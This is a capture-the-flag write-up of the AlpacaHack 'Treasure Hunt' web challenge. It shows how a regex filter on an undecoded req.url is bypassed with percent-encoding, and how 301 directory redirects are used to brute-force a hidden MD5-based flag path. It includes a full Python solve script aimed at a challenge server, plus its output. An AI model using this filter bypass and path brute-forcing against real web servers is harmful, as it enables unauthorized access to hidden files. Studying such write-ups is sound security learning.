Treasure Hunt
Overview
- 71 solves / 116 points
- Author: @ark
- Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆
Background
Can you find a treasure?
Enumeration
Index page:
Here, we can visit different paths, such as /book, which just returns a book emoji.
However, if we go to /alpaca, it says “Bad URL: /alpaca”.
Hmm… Why is that? Let’s read the source code of this web application and figure out why.
In this challenge, we can download a file:
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:10:58(HKT)]
└> file treasure-hunt.tar.gz
treasure-hunt.tar.gz: gzip compressed data, from Unix, original size modulo 2^32 51200
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:11:00(HKT)]
└> tar xvzf treasure-hunt.tar.gz
treasure-hunt/
treasure-hunt/compose.yaml
treasure-hunt/web/
treasure-hunt/web/index.js
treasure-hunt/web/package.json
treasure-hunt/web/package-lock.json
treasure-hunt/web/Dockerfile
treasure-hunt/web/public/
treasure-hunt/web/public/key
[...]
After reading the source code, we can see that this is a very simple web application written in JavaScript with the Express.js framework.
In web/Dockerfile, we can also see that the flag file is placed at a very unusual path:
# Create flag.txt
RUN echo 'Alpaca{REDACTED}' > ./flag.txt

# Move flag.txt to $FLAG_PATH
RUN FLAG_PATH=./public/$(md5sum flag.txt | cut -c-32 | fold -w1 | paste -sd /)/f/l/a/g/./t/x/t \
    && mkdir -p $(dirname $FLAG_PATH) \
    && mv flag.txt $FLAG_PATH
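Assuming the MD5 hash of flag.txt is 3876917cbd1b3db12e39587c66ac2891, every hex character of the hash becomes its own directory, and the flag path looks something like this (the "." component just refers to the current directory, so it drops out):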
./public/3/8/7/6/9/1/7/c/<snipped_md5_hash_path>/8/9/1/f/l/a/g/t/x/t
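To make the path construction concrete, here is a minimal Python sketch that mirrors the Dockerfile's shell pipeline. The function name flag_path is hypothetical, and the input is the redacted placeholder from the Dockerfile, so the printed hash is not the real one. It assumes echo wrote a trailing newline into flag.txt, which is its default behavior.

```python
import hashlib
import posixpath


def flag_path(flag_file_contents: bytes) -> str:
    """Rebuild the flag path the way the Dockerfile's shell pipeline does."""
    # md5sum flag.txt | cut -c-32 -> the 32 lowercase hex characters of the digest
    digest = hashlib.md5(flag_file_contents).hexdigest()
    # fold -w1 | paste -sd / -> one directory per hex character
    hash_dirs = "/".join(digest)
    raw = f"./public/{hash_dirs}/f/l/a/g/./t/x/t"
    # normpath collapses the "." components, as the filesystem would
    return posixpath.normpath(raw)


# Placeholder contents: the real flag is redacted in the challenge files
path = flag_path(b"Alpaca{REDACTED}\n")
print(path)
print(len(path.split("/")) - 1, "path components below public/")
```

Below public/ there are 32 hash directories, six more directories (f, l, a, g, t, x), and finally a file named t.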
Hmm… So we’ll need to brute force the flag’s MD5 hash and get the correct path?
Anyway, why does the path /alpaca return “Bad URL”?
If we take a look at web/index.js, we can see that every request must go through this middleware:
app.use((req, res, next) => {
  res.type("text");
  if (/[flag]/.test(req.url)) {
    res.status(400).send(`Bad URL: ${req.url}`);
    return;
  }
  next();
});
Here, the pattern /[flag]/ is a character class, so it matches any single f, l, a, or g anywhere in the request URL, not the word "flag". If there is a match, the middleware returns HTTP status 400 with the body Bad URL: <our_path>.
In the above case, the path /alpaca contains the character a, which matches the regular expression pattern, hence the “Bad URL” response.
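The filter's behavior can be reproduced outside the application. The following is a small Python sketch, not the challenge's code: is_blocked is a hypothetical helper, and Python's re.search is used as the counterpart of JavaScript's RegExp test for this pattern.

```python
import re

# Same pattern as the middleware's /[flag]/: a character class, not the word "flag"
FILTER = re.compile(r"[flag]")


def is_blocked(url: str) -> bool:
    """Return True if the middleware would answer with 'Bad URL'."""
    return FILTER.search(url) is not None


for url in ["/book", "/alpaca", "/key", "/book?x=a"]:
    print(url, is_blocked(url))
```

Note that req.url also contains the query string, so a filtered letter there is rejected as well, as the last example shows.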
Hmm… Wait, is req.url automatically URL-decoded? If not, maybe we can bypass the filter via URL encoding.
Let’s log req.url and check it out!
app.use((req, res, next) => {
  console.log("[DEBUG] req.url", req.url);
  res.type("text");
  if (/[flag]/.test(req.url)) {
    res.status(400).send(`Bad URL: ${req.url}`);
    return;
  }
  next();
});
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:27:15(HKT)]
└> cd treasure-hunt
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt/treasure-hunt)-[2024.12.01|15:27:15(HKT)]
└> docker compose up --build
[...]
Attaching to treasure-hunt-1
GET /%61%6c%70%61%63%61 HTTP/1.1
Host: localhost:3000
Response:
HTTP/1.1 200 OK
[...]
🦙
Log message:
treasure-hunt-1 | [DEBUG] req.url /%61%6c%70%61%63%61
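Nope, req.url is not URL-decoded, so the encoded path passes the filter. The 🦙 response shows that the handler serving the file still resolves the decoded path, which means we successfully bypassed the filter!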
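The bypass can be checked offline with a short Python sketch. encode_segment is a hypothetical helper that assumes ASCII input, and unquote stands in for whatever decoding the server applies later. Uppercase hex is used here as a precaution, since the lowercase encoding of some characters (for example o as %6f) would itself contain a filtered letter; the characters needed in this challenge are unaffected either way.

```python
import re
from urllib.parse import unquote

FILTER = re.compile(r"[flag]")  # same pattern as the middleware


def encode_segment(segment: str) -> str:
    """Percent-encode every character of an ASCII path segment."""
    # Uppercase hex digits can never be one of the filtered lowercase letters
    return "".join(f"%{ord(ch):02X}" for ch in segment)


encoded = "/" + encode_segment("alpaca")
print(encoded)                          # /%61%6C%70%61%63%61
print(FILTER.search(encoded) is None)   # True: the raw URL passes the filter
print(unquote(encoded))                 # /alpaca: what the decoded path resolves to
```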
Now, how can we brute force the flag’s path?
After some trial and error, it seems that when the requested resource is a directory and the trailing slash is missing, such as /1, we are redirected to the path with the trailing slash, such as /1/. This gives us a way to tell whether a directory exists:
GET /3 HTTP/1.1
Host: localhost:3000
Response:
HTTP/1.1 301 Moved Permanently
[...]
Location: /3/
[...]
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Redirecting</title>
</head>
<body>
<pre>Redirecting to /3/</pre>
</body>
</html>
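The redirect turns the search into a character-by-character problem: instead of guessing all 32 hex characters at once, each position needs at most 16 requests, so at most 16 × 32 = 512 in total. Here is a minimal offline sketch of that idea in Python. The names recover_hash and fake_oracle are hypothetical, and the oracle is a stand-in for "the server answered 301", using the example hash from earlier rather than the real one.

```python
HEX_CHARS = "0123456789abcdef"


def recover_hash(is_directory, length=32):
    """Recover a hex string one character at a time via an existence oracle."""
    found = ""
    requests_made = 0
    while len(found) < length:
        for ch in HEX_CHARS:
            requests_made += 1
            if is_directory(found + ch):
                found += ch
                break
        else:
            # No candidate matched: the oracle is not behaving as assumed
            raise RuntimeError(f"no candidate matched after prefix {found!r}")
    return found, requests_made


# Stand-in for the server: a prefix "exists" only if the secret starts with it
secret = "3876917cbd1b3db12e39587c66ac2891"


def fake_oracle(prefix: str) -> bool:
    return secret.startswith(prefix)


recovered, count = recover_hash(fake_oracle)
print(recovered == secret, count <= 16 * 32)
```

Against the real target, the oracle would send a GET request for the encoded prefix and report whether the status code is 301.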
Exploitation
With that said, we can write a Python script to brute force the correct path and get the flag!
solve.py
#!/usr/bin/env python3
import http.client
from string import hexdigits


class Solver:
    def __init__(self, baseUrl):
        self.baseUrl = baseUrl
        self.connection = http.client.HTTPConnection(self.baseUrl.split('http://')[1])
        self.MD5_CHARACTER_SET = hexdigits
        self.MD5_HEX_LENGTH = 32

    @staticmethod
    def urlEncodeCharacter(character):
        # Percent-encode a single character, e.g. 'a' -> '%61'
        return f'%{ord(character):x}'

    def bruteForceFlag(self):
        flagHash = str()
        finalPath = '/'
        while len(flagHash) < self.MD5_HEX_LENGTH:
            for character in self.MD5_CHARACTER_SET:
                print(f'[*] Brute forcing character "{character}"', end='\r')
                encodedCharacter = Solver.urlEncodeCharacter(character)
                # finalPath always ends with '/', so append the candidate directly
                path = f'{finalPath}{encodedCharacter}'

                self.connection.request("GET", path)
                response = self.connection.getresponse()
                response.read()

                # A 301 redirect means the candidate is an existing directory
                if response.status != 301:
                    continue

                finalPath += f'{encodedCharacter}/'
                flagHash += character
                break
            else:
                # No candidate matched, so stop instead of looping forever
                raise RuntimeError(f'No directory found under {finalPath}')

        print(f'\n[+] Got flag MD5 hash: {flagHash}')
        return finalPath

    def getFlag(self, flagHashPath):
        finalPath = flagHashPath
        for character in ['f', 'l', 'a', 'g', 't', 'x', 't']:
            encodedCharacter = Solver.urlEncodeCharacter(character)
            finalPath += f'{encodedCharacter}/'

        # The last component is the flag file, not a directory
        finalPath = finalPath.rstrip('/')
        print(f'[*] Getting the flag via path: {finalPath}')
        self.connection.request("GET", finalPath)
        response = self.connection.getresponse()
        data = response.read()
        flag = data.decode().strip()
        print(f'[+] Flag: {flag}')

    def solve(self):
        flagHashPath = self.bruteForceFlag()
        self.getFlag(flagHashPath)


if __name__ == '__main__':
    # baseUrl = 'http://localhost:3000' # for local testing
    baseUrl = 'http://34.170.146.252:19843'
    solver = Solver(baseUrl)

    solver.solve()
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|16:15:11(HKT)]
└> python3 solve.py
[*] Brute forcing character "f"
[+] Got flag MD5 hash: 4bafb19a7b66cb415eb070ce1a1b2e8f
[*] Getting the flag via path: /%34/%62/%61/%66/%62/%31/%39/%61/%37/%62/%36/%36/%63/%62/%34/%31/%35/%65/%62/%30/%37/%30/%63/%65/%31/%61/%31/%62/%32/%65/%38/%66/%66/%6c/%61/%67/%74/%78/%74
[+] Flag: Alpaca{alpacapacapacakoshitantan}
- Flag: Alpaca{alpacapacapacakoshitantan}
Conclusion
What we’ve learned:
- Bypassing a regular expression filter on req.url via URL encoding